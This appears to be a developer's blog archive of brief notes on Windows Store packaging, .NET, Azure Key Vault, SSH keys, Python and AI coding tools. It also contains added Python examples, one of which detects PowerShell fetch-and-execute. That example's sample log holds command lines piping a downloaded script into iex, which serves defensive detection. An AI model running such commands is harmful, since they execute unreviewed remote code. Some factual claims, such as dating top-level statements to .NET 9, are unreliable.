Friday, 13 February 2026

Windows Baseline Security

Windows Baseline Security is something new for the Age of AI Agents.

The AI Agent Prevention Society

One of the obstacles to AI agents becoming all-powerful is the technology infrastructure that actively seeks to obstruct agents.

This technology has various names, one being WAF, or web application firewall.  

The purpose of a WAF is to protect web applications from common attacks.

Recall the OWASP Top Ten Risks? Some of the motivation behind these protections is good - for example, guarding against bot-driven DDoS attacks.

There are various vendors and products in this space, such as Imperva WAF, Cloudflare, Akamai Site Defender, AWS WAF, Azure Web Application Firewall and Google Cloud Armor.

These solutions are all effective at detecting and blocking agents, headless browsers, scrapers, credential stuffing bots (where leaked usernames and passwords are used across numerous websites to exploit potential duplication) and automated (even if legitimate) login attempts.

Actions taken can range from limiting requests based on IP and presenting CAPTCHA challenges to blocking certain geographies. However, these actions may prevent legitimate bots from using required services, or performing agentic actions on behalf of legitimate users.

Hushlogins

Wednesday, 11 February 2026

Cloudflare R2

The Cloudflare R2 Developer's Guide is good reading for developers needing to use this CDN.

Applications include storage for cloud native applications, podcast content as well as storage for batch process output.

Core concepts are Buckets and Objects.

Accelerating "safe AI adoption" is one of the company's current mantras.

Immutable GitHub Releases

Some software is distributed as immutable GitHub releases (this is for software supply chain security). One such example is Inno Setup.

Windows SDK

Windows SDK is needed for MSIX packaging. Windows 11 SDK includes Windows Performance Toolkit, Application Verifier for Windows and Debugging Tools for Windows.

Ingress and Egress Fees

Ingress and egress fees refer to the cost of data transfer into and out of the cloud.
  • Ingress fees are typically zero - allowing users to upload data to Amazon S3 or Azure Blob Storage with no additional charge. 
  • Egress fees are typically charged when data exits the cloud. These fees can differ significantly between providers and source and destination region.

Hosting on S3 will set you back $0 for 1 GB download per month, and around 1000 downloads of a 50 MB file will cost you just under $5 a month.

Microsoft Store Policies

Microsoft Store (Windows Store) has policies on Product and Content, which developers must abide by.

There are a few rules around IAP - short for "in app purchases".

What is DXCore ... really?

Suppose you run wsl --version and see your DXCore version listed as 10.0.26100.  

This happens to be a similar version code to your Windows version. 

So, what is DXCore?

DXCore is the low-level engine inside Windows that talks directly to graphics hardware. It is the foundation layer that modern graphics APIs (like Direct3D 12) run on.

The IARC and Windows Software

The IARC is the International Age Rating Coalition, a global initiative to streamline age ratings for games and applications. Over 19m games and apps have so far been published using IARC. Developers must abide by the IARC Terms of Use.

Tuesday, 10 February 2026

Uploading App Packages to the Windows Store

There are a bunch of rules to follow when uploading packages to the Windows Store.

One hard requirement is a "Package URL" which is a versioned, secure URL pointing to the app package (MSI/EXE) hosted on your CDN.

An example could be https://windowscottoneyejoe/downloads/1.1/setup.exe

When a customer installs a package, the Store downloads the package from the URL. Good CDN practices should be followed - to ensure the URL is performant, reliable and available in your relevant target markets.

(Sidebar - Google have some great recommendations on CDN best practices. They also have their own commercial CDN products known as Cloud CDN and Media CDN; other vendors offer CDN services too, including Cloudflare.)

Note: as your application versions evolve, you may need to update the package URL. This is done by using the Update submission option in Partner Center to specify the new package URL.

Windows Store Apps - Pricing

If you are a Windows Store developer, you have a few pricing options: Free, Freemium (optional in-app purchases), Subscription or Paid (one-time payment).

Quick Guide to the GDK

The GDK, or Game Development Kit, enables developers to develop games on Xbox and Windows.

The What's New page covers new developments to the GDK.

Monday, 9 February 2026

Do Not Commit csproj.user file

This contains per developer, per machine settings.

For example, when you last ran a Debug session, it will have a record of what you selected in the dropdown next to the Run/Debug button under _lastSelectedProfile. It may also contain user-specific folder paths.

What is Ready to Run (R2R) Compilation in Visual Studio?

Ready-to-run compilation is a feature in .NET that improves startup performance by compiling application assemblies in Ready-to-run (R2R) format. This is a form of AOT (ahead-of-time) compilation that reduces work for the JIT compiler as the application loads. Your binary contains IL and precompiled IL. It only works if you target specific environments such as Linux x64 or Windows x64.

Rust uses C++

Tales of the end of C++ are greatly exaggerated. Rust uses C++ in the shape of LLVM which is built in C++. Sure, the Rust compiler (rustc - which was initially OCaml'd and rewritten in Rust) is mostly Rust with some legacy bits in C++, but the backend (LLVM) used for code generation is C++ code. The standard library has some C bindings too, but that's by the by.

The Return of C++ Tools in Visual Studio

Today - C# programmers must embrace C++ development tools. There is No Alternative. The C++ tools contain the valuable link.exe to create standalone .exe files. Publishing .NET programs as standalone EXEs needing no runtime needs this toolkit. Install it! Give up that 1.5 GB of space for some C++ tooling!

How Does GitHub Copilot Analyze Unexpected Behaviour

Suppose you have a release EXE file that has an unexpected dependency at runtime on a DLL. GitHub Copilot will analyze your project file (.csproj) for build settings and request permission to view the build log output from your most recent build. It then makes recommendations (e.g. filling in a missing step in the build to remediate your problem).

Where did the .csproj file go in Visual Studio??

Ooh tricky one.  Go to Solution Explorer. 

Double click on your project under Solution XYZ (1 of N projects).

It pops up.

If still stuck - GitHub Copilot always knows where it's hiding.

GitHub Copilot Integration in Visual Studio

GitHub Copilot integrates neatly into Visual Studio - if a little slowly.  A little green tick in the top right of your IDE shows you that Copilot is active.  You also get a "Copilot Consumptions" screen that shows you your consumption in terms of requests and code completions.

Control-Shift-A

Create a new resource in the Solution Explorer in Visual Studio.

Windows Application Packaging Project

The best way to build an MSIX.

Lift the Hood, Change the Oil

...understand all the components... This technology is so important to the future. You must have some tactical understanding of it. Recommends Jensen Huang, 2026.

The Most Important Part of AI is Applications

 ..all the layer underneath is just infrastructure stuff (Jensen Huang, 2026).

How Users Can do Side-Loading

Here's a how to.

  • Double-click the .msix or .msixbundle file
  • Install via PowerShell: Add-AppxPackage
  • Deploy and distribute internally

Add-AppxPackage is a cmdlet.


WinUI Blank App (Packaged)

This is a project template for creating a WinUI app along with an MSIX package for side-loading or distribution via the Microsoft Store.

Side-loading in the above case refers to installing an app outside of the Microsoft Store, usually by providing the MSIX package to users.


A Closer Look at System.Drawing's Bitmap Class

The System namespace is your root namespace for all foundational features in .NET. Primitive types (Int32, String, Boolean) as well as core base classes (Object, Exception) are found here.

The System.Drawing namespace is the home of GDI+ functionality (GDI+ is the enhanced form of the Windows Graphics Device Interface, or GDI, in use since Windows XP i.e. since 2001).

Within this, you have the Bitmap class, which represents a GDI+ bitmap where a bitmap is simply an image defined by pixel data.  The code lives in System.Drawing.Common.dll.

It is a sealed class, which prevents it from being inherited.

If you are missing the relevant package in your .NET project, run the following command in your project directory: 

dotnet add package System.Drawing.Common

(dotnet add package adds package references to a designated project file, or searches the current directory for one if not specified.)

Recover Solution Explorer

If you have closed Solution Explorer (for example, to have a more complete view of your code) then Control-Alt-L is the classic key combination to recover the Solution Explorer.

Enable Native AOT Publish

Native AOT (Ahead-of-time) deployment compiles your app to native code avoiding the need for a runtime. Compilation takes longer but the app runs faster, and with lower memory usage. Debugging may be more complicated relative to regular .NET applications.

The project file (opened from Solution Explorer) contains the setting required for this:

<PublishAot>true</PublishAot>

More details on AOT deployment here.

Top Level Statements (TLS) in .NET

Top level statements were introduced in .NET 9 as a way to avoid Main methods in .NET programs. This makes .NET programs look more like simple scripts.

STS versus LTS in .NET Versioning (STANDARD vs LONG)

STS and LTS have very specific meanings in .NET versioning. WinJoes must be truly on top of these different versioning schemes.

For example, WinJane may be faced with a choice to build a console app with .NET 8.0 (LTS) or .NET 9.0 (STS) and should understand the trade-offs between the two.

STS = Standard Term Support (NOT short term support, which might be seen as the natural counter to LTS).

STS releases have a shorter support window, faster iteration and more frequent updates. They suit developers who need the newest features and are OK with no multi-year stability guarantees. They are intended to keep the platform evolving quickly. Since .NET 5, STS releases have odd version numbers.

STS releases have a typical lifetime around 18 months, and LTS around 3 years.

Software teams have different strategies: 1) anchor on LTS for stability, 2) use STS to ride the innovation wave. Microsoft keep odd numbered versions as STS and even numbered as LTS.

Saturday, 7 February 2026

Keep up to Speed with C# Language Design Discussions

The content of language meetings is detailed here.

Thursday, 5 February 2026

Personal AI Assistants

Personal AI assistants are here, but security controls are askew.  OpenClaw is an example of such an assistant.  It acts as a bridge between messaging devices (such as WhatsApp, Telegram, iMessage) and AI agents. Ollama integrates with it.

Sunday, 1 February 2026

GGUF = GPT-Generated Unified Format

GGUF is a special model file format used to run LLMs efficiently on your own computer. It stands for GPT-Generated Unified Format. It is the successor to GGML. Privacy-sensitive workflows are one application of these optimized-for-local execution model packages.

Friday, 30 January 2026

Using ssh-keygen from WSL to generate an SSH key

SSH keys are useful to enable access to networked resources.  

The command ssh-keygen (the OpenSSH authentication key utility) can be used to generate keys.

Example usage:  ssh-keygen -t ed25519 -C "myemail@mydomain.com".  

The -t option signifies type, and ed25519 refers to the algorithm based on Elliptic Curve Cryptography using an Edwards curve (the recommended default - it competes with RSA which is needed for compatibility with older systems). The -C flag provides a new comment. 

What gets generated is actually a pair of keys, a private key (stored locally) and a public key (stored on the server, but reference copy is typically stored locally too, in your .ssh directory).  It is an asymmetric authentication (not encryption) protocol.

info ssh-keygen will help you decode other command line options for generating keys.

The generated keys are stored in ~/.ssh.
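
The public half of the pair is a single line holding the key type chosen with -t, a base64 blob and the -C comment. The following added example (not part of the original post, and not OpenSSH code) parses such a line, checks that the declared type matches the type embedded in the blob and reports the key size. The sample lines are constructed placeholders rather than real keys, and MIN_RSA_BITS is an assumed policy value.

```python
import base64
import struct

MIN_RSA_BITS = 3072  # assumed policy for this example; adjust to your own


def _read_string(blob: bytes, offset: int):
    """Read one SSH wire-format string: uint32 length, then that many bytes."""
    if offset + 4 > len(blob):
        raise ValueError("truncated key blob")
    (length,) = struct.unpack_from(">I", blob, offset)
    start, end = offset + 4, offset + 4 + length
    if end > len(blob):
        raise ValueError("truncated key blob")
    return blob[start:end], end


def inspect_public_key(line: str) -> dict:
    """Parse one line of a .pub file: '<type> <base64 blob> [comment]'."""
    fields = line.strip().split(None, 2)
    if len(fields) < 2:
        raise ValueError("expected '<type> <base64> [comment]'")
    declared, b64 = fields[0], fields[1]
    comment = fields[2] if len(fields) == 3 else ""
    blob = base64.b64decode(b64, validate=True)
    embedded, pos = _read_string(blob, 0)
    if embedded.decode("ascii", "replace") != declared:
        raise ValueError("declared type does not match the key blob")
    if declared == "ssh-ed25519":
        key, pos = _read_string(blob, pos)
        bits, ok = len(key) * 8, len(key) == 32
    elif declared == "ssh-rsa":
        _e, pos = _read_string(blob, pos)      # public exponent
        n, pos = _read_string(blob, pos)       # modulus
        bits = int.from_bytes(n, "big").bit_length()
        ok = bits >= MIN_RSA_BITS
    else:
        raise ValueError(f"key type not handled in this example: {declared}")
    return {"type": declared, "bits": bits, "comment": comment, "meets_policy": ok}


def _wire(*parts: bytes) -> str:
    """Encode parts as length-prefixed strings and base64 the result."""
    raw = b"".join(struct.pack(">I", len(p)) + p for p in parts)
    return base64.b64encode(raw).decode()


def _mpint(n: int) -> bytes:
    """Positive SSH mpint body: big-endian with a leading zero if needed."""
    return n.to_bytes(n.bit_length() // 8 + 1, "big")


# Constructed samples (placeholder key material, not usable keys).
SAMPLE_ED25519 = ("ssh-ed25519 " + _wire(b"ssh-ed25519", bytes(32))
                  + " myemail@mydomain.com")
SAMPLE_RSA_1024 = ("ssh-rsa "
                   + _wire(b"ssh-rsa", _mpint(65537), _mpint((1 << 1023) | 1))
                   + " legacy@example.invalid")

if __name__ == "__main__":
    for sample in (SAMPLE_ED25519, SAMPLE_RSA_1024):
        print(inspect_public_key(sample))
```
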

Managed HSM as a secure key storage option in Azure

Managed HSM (Hardware Security Module) is the option for when you need the highest level of key protection in Azure.

FIPS 140-3 Level 3 hardware is utilised.  

These are stringent security requirements set by NIST. They include: physical security through hardened enclosure and tamper-evident seals and active tamper-detection. The tamper detection includes detection of physical intrusion, temperature and voltage anomalies.

Azure Key Vault

Azure Key Vault can store keys (e.g. API keys) securely which can then be retrieved by applications at runtime. Passwords and certificates can also be stored in the vault.

Objects in the vault are uniquely identified by a case-insensitive identifier called the object identifier. It has a prefix identifying the key vault, object type, user-provided object name, and object version. 

The key vault section starts with https://{vault-name}.vault.azure.net or https://{hsm-name}.managedhsm.azure.net, for Managed HSM Pools.

Object types are "keys", "secrets" or "certificates". 

The object name must be unique within the key vault. Only digits, letters and dashes are allowed in the object name. The object name must be between 1 and 127 characters long.
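
One way an application could check an object identifier against the rules above before using it to fetch a secret, as an added example (not code from this blog or from the Azure SDK). The allow-list of vault hosts, the function names and the "contoso" sample values are assumptions, as are the alphanumeric version check and reading a missing version as "current version".

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

VAULT_SUFFIXES = (".vault.azure.net", ".managedhsm.azure.net")
OBJECT_TYPES = {"keys", "secrets", "certificates"}
NAME_RE = re.compile(r"[0-9a-z-]{1,127}")   # digits, letters, dashes; 1-127 chars
VERSION_RE = re.compile(r"[0-9a-z]+")       # assumption: alphanumeric version


@dataclass(frozen=True)
class ObjectId:
    vault_host: str
    object_type: str
    name: str
    version: Optional[str]   # None is read here as "current version" (assumption)


def parse_object_id(identifier: str, allowed_vaults: set) -> ObjectId:
    """Validate an identifier and return it lower-cased (it is case-insensitive).

    allowed_vaults is a hypothetical application allow-list of vault host names.
    """
    parts = urlsplit(identifier.strip().lower())
    if parts.scheme != "https":
        raise ValueError("identifier must use https")
    if parts.username or parts.password or parts.port or parts.query or parts.fragment:
        raise ValueError("userinfo, port, query and fragment are not expected")
    host = parts.hostname or ""
    suffix = next((s for s in VAULT_SUFFIXES if host.endswith(s)), None)
    # Exactly one label before the suffix, so "x.vault.azure.net.evil.example"
    # and "a.b.vault.azure.net" are both refused.
    if suffix is None or not host[: -len(suffix)] or "." in host[: -len(suffix)]:
        raise ValueError(f"not a Key Vault or Managed HSM host: {host!r}")
    if host not in {v.lower() for v in allowed_vaults}:
        raise ValueError(f"vault {host!r} is not on the allow-list")
    segments = parts.path.split("/")[1:]
    if len(segments) not in (2, 3):
        raise ValueError("expected /{object-type}/{object-name}[/{object-version}]")
    object_type, name = segments[0], segments[1]
    version = segments[2] if len(segments) == 3 else None
    if object_type not in OBJECT_TYPES:
        raise ValueError(f"unknown object type: {object_type!r}")
    if not NAME_RE.fullmatch(name):
        raise ValueError("object name must be 1-127 letters, digits or dashes")
    if version is not None and not VERSION_RE.fullmatch(version):
        raise ValueError("unexpected characters in object version")
    return ObjectId(host, object_type, name, version)


def is_trusted_object_id(identifier: str, allowed_vaults: set) -> bool:
    """Boolean wrapper for callers that only need accept or reject."""
    try:
        parse_object_id(identifier, allowed_vaults)
        return True
    except ValueError:
        return False
```
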

LiteLLM

LiteLLM lets you make calls into a variety of LLMs using OpenAI conventions. Think of it as a lightweight model router. LangChain is somewhat similar - but with a bunch of added stuff on agents and orchestration.

Thursday, 29 January 2026

OpenAI's Advice on Key Safety

OpenAI has a set of recommendations on key safety. There are basically two types of keys: API keys and admin keys (to check usage limits, quotas etc.). Read more on those recommendations here, also summarised below.

The first recommendation (rule) is do not share API keys. API keys are unique to users, even if those users are on the same team.

The second recommendation is that the OpenAI API key should not be exposed in client-side environments like browsers or mobile apps, which could allow malicious users to make requests as you.

Wednesday, 28 January 2026

Excel Data Validation Rules

Where to find data validation rules in Excel's ribbon? 

Data -> Data Tools -> click on the drop-down with a green tick and a red no-entry sign, then select Data Validation.

You can choose to allow any values, or restrict values e.g. to a list.

Software as a Production Line

Think of software as a production line. You want to automate all parts of that production line. And there are lots of pieces to automate.  Continuous integration and continuous deployment are components of that, but there are other elements not covered by CICD which also need automation. Automate everything.

iex in PowerShell

iex in PowerShell is Invoke-Expression - a cmdlet that takes a string and executes it like a PowerShell expression.  It's often used to run code fetched from external sources.

How Claude Code Works

Read more here.

Claude Code is an agentic assistant running in your terminal. It is an "agentic harness" around Claude.

Programming Work and AI

Using AI for programming makes you realise (if you haven't already) how much of programming work is mechanical.  

AI then becomes a high-level design partner once that low-level development is conquered.

At an even higher level, AI is the business partner that helps you decide what to build.

irm in PowerShell

The irm command in PowerShell is an alias for the cmdlet Invoke-RestMethod. This is used to send HTTP and HTTPS requests to RESTful web services and retrieve the response. It is used to interact with APIs and download data from the web.
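
Because iex runs whatever string it is given and irm fetches content from the web, the two appearing on one command line mean remote code is executed unreviewed. The following added example (not from the original posts) covers both the iex and irm entries: it flags that combination in process command-line logs. The log lines are constructed, and the inclusion of iwr / Invoke-WebRequest and the verdict names are choices made for this example.

```python
import re
from typing import NamedTuple, Optional

# Token boundaries that treat "-" as part of a word, so cmdlet names such as
# Invoke-RestMethod match whole and not as fragments of longer names.
_B, _E = r"(?<![\w-])", r"(?![\w-])"
# irm / Invoke-RestMethod and iex / Invoke-Expression come from the text;
# iwr / Invoke-WebRequest is added here as the sibling download cmdlet.
FETCH_RE = re.compile(_B + r"(?:irm|invoke-restmethod|iwr|invoke-webrequest)" + _E, re.I)
EXEC_RE = re.compile(_B + r"(?:iex|invoke-expression)" + _E, re.I)
URL_RE = re.compile(r"https?://[^\s'\"|;)]+", re.I)


class Finding(NamedTuple):
    line_no: int
    verdict: str      # "fetch-and-execute" or "execute-only"
    urls: tuple       # URLs seen on the command line
    cleartext: bool   # True when any URL is plain http://


def classify(line_no: int, command_line: str) -> Optional[Finding]:
    """Return a Finding when the command line evaluates a string as code."""
    if not EXEC_RE.search(command_line):
        return None   # a fetch on its own only retrieves data
    urls = tuple(URL_RE.findall(command_line))
    fetched = bool(FETCH_RE.search(command_line))
    verdict = "fetch-and-execute" if fetched else "execute-only"
    cleartext = any(u.lower().startswith("http://") for u in urls)
    return Finding(line_no, verdict, urls, cleartext)


def scan(lines) -> list:
    """Classify every line (numbered from 1) and keep the findings."""
    findings = (classify(n, line) for n, line in enumerate(lines, start=1))
    return [f for f in findings if f is not None]


# Constructed sample of process command lines (not from a real system).
SAMPLE_LOG = [
    r'powershell.exe -NoProfile -Command "irm https://example.invalid/install.ps1 | iex"',
    r'powershell.exe -Command "Invoke-RestMethod https://api.example.invalid/v1/status"',
    r'powershell.exe -Command "Invoke-Expression (Invoke-RestMethod http://example.invalid/setup.ps1)"',
    r'powershell.exe -Command "iex $env:BUILD_STEP"',
    r'powershell.exe -File C:\scripts\backup.ps1',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

String matching of this kind misses encoded or obfuscated commands; PowerShell script block logging records the decoded script text, which is a better input for the same check.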

Claude Code

Learn about Claude Code here.  When you log in to Claude for the first time, it asks you to identify three areas of interest. This could range from coding, learning to business strategy.

Claude will ask you to acknowledge the following conditions:
  • Service may impose rate limits or usage quotas
  • Output accuracy is disclaimed
  • Output may be refused if it violates safety policy

Various Python Text UI Options

We have covered Textual in an earlier post.  Some other frameworks to build text UIs in Python include:

  • Curses - a wrapper around Unix ncurses
  • Rich - rich text formatting in the terminal

Python Textual Framework

Textual is built by Textualize.io. Applications can be run in a terminal or web browser. Here is a tutorial.

Blogger API and OAuth2

Read more here.  The latest Blogger API is v3. OAuth2 ("Open Authorization") is a standard protocol replacing OAuth 1.0 in 2012.

JDK Switcheroo for "Xamarin"

Read more here on the move from Oracle's JDK to a more lightweight version intended solely for Android development.

Your version of Visual Studio is no longer supported or serviced

Visual Studio has to be constantly updated. This is for security fixes, quality updates and experimental features. Sometimes, stuff gets removed, too.

Friday, 23 January 2026

Character format issues in emacs

The command cat -v is very useful to show control characters in a file. For example, if you want to debug unusual speech marks (Unicode used instead of ASCII) this is one way to do it.

Replit versus GitHub Codespaces

Replit lets you build and run applications in the cloud, from within a web browser. GitHub Codespaces runs VS Code in the cloud, in effect replicating a full dev setup there.

dataclasses in Python

Classes that hold data - cool, right? But boring to implement. Python dataclasses have the solution; they are described in PEP 557. But check too what Pydantic has to offer.

What is Pydantic?

Pydantic is used in a number of Python frameworks and libraries - for example, it is used in LangChain extensively.

Pydantic is a widely used data validation library.  

It makes extensive use of the annotations feature in Python. It is worthwhile to understand them in the context of type hints.

Tuesday, 13 January 2026

Deployment Toolkit (MDT) Support Removed - Try Windows Autopilot

Microsoft has removed support for its legacy enterprise deployment toolkit known as MDT (Microsoft Deployment Toolkit). 

This means no more updates (including for future versions of Windows) or security patches. 

Microsoft have recommended Windows Autopilot for cloud based deployment, or Configuration Manager operating system deployment (OSD) for on-prem infrastructure requirements, as alternatives.

Autopilot can be used to deploy Windows PCs as well as HoloLens 2.

Fans lament that MDT was free and did not force Azure cloud adoption.

Friday, 9 January 2026

What is SASE?

SASE is Secure Access Service Edge, which delivers networking and security through a cloud service.

Tuesday, 6 January 2026

Analytics Libraries Expect Regularised Data

This is a recurrent theme in quantitative computing. 

Analytics libraries expect clean, regularised data, e.g. time series with no missing values. Real-life data often has gaps and idiosyncrasies - it often needs to be cleaned (to create a golden source), but even then it is subsequently rejigged based on the consumer's need.

This is akin to the Adapter Design Pattern in programming. In the Adapter you adapt an "interface" to another "interface" - for example, an XML dataset is "adapted" into a JSON dataset for JSON consumers.

Statistical libraries are particularly picky about datasets and consistency, especially when comparing datasets and trying to find relationships or errors between actual and expected values.

What a DataFrame truly is in Python

A DataFrame is actually a pandas.core.frame.DataFrame.

Monday, 5 January 2026

The list() constructor in Python

The list constructor in Python is interesting because there are evidently more obvious ways to create lists, namely via square bracket notation.  However, using the constructor directly has a number of use cases.

Here are some syntactical examples of using the list constructor.

empty_list = list()
tuple_to_list = list( (1,2,3) )
string_to_list = list("constructor") # creates a list made of individual letters as elements

Testing Prediction Models - Out of Sample Testing

When testing a prediction model, it is a good idea to do "out of sample" testing. 

This involves testing a model or strategy on data that was not used during model building or training. It thus evaluates how well the model performs on new, unseen data.

Python Internal Modules - The Underscore Convention

After debugging Python for a while you will certainly see some files with leading underscores. 

This is a Python convention to indicate the file is not part of the public interface of the module.  An example could be _mixins.py for a mixins class (this is used in pandas for example).  

When doing a "from package import *", any file with a leading underscore is not imported, respecting this convention.

Sometimes an underscore can also be used to prevent name collisions e.g. implementing some JSON helpers in _json.py to avoid conflict with another json.py (pandas has this file too).

Pat yourself on the back if you have debugged into an underscore-prefixed file - you have ventured into the hidden depths of a package's implementation details. Good Job!

Python Debugger Survival Skills

There are many times you will need to use the Python debugger to understand why something is not working (oftentimes in a third-party library).

pdb - invokes the debugger
n - moves to the next line (can press carriage return - same effect)
s - steps into the code

It will certainly help you explore and understand more about how the third-party libraries work.

ARIMA in Python: Endogenous versus Exogenous Variables

The ARIMA model in statsmodels is described here.

Its constructor has the following initial arguments: ARIMA( endog, exog=None, order=(0,0,0),....).

  • endog - observed time series process, y
  • exog - array of "exogenous regressors"
  • order - (p, d, q) model for autoregressive, differences and moving average component

Exogenous regressors are added to the ARIMA equation where external variables may have some forecasting power. For example, electricity demand could utilise temperature as an exogenous variable.

The (p, d, q) component specification can be said to be the true "spirit" of ARIMA.

ARIMA methods were created by George Box and Gwilym Jenkins and are hence sometimes called Box-Jenkins methods.

SARIMA extends this to Seasonal Data, where seasonal differencing is used to create stationarity.

Sunday, 4 January 2026

Claude Code

Claude Code is built for developers - try it.

You can run it from a terminal (formerly only WSL).

Due to prompt injection risks, do not use it on codebases you do not trust.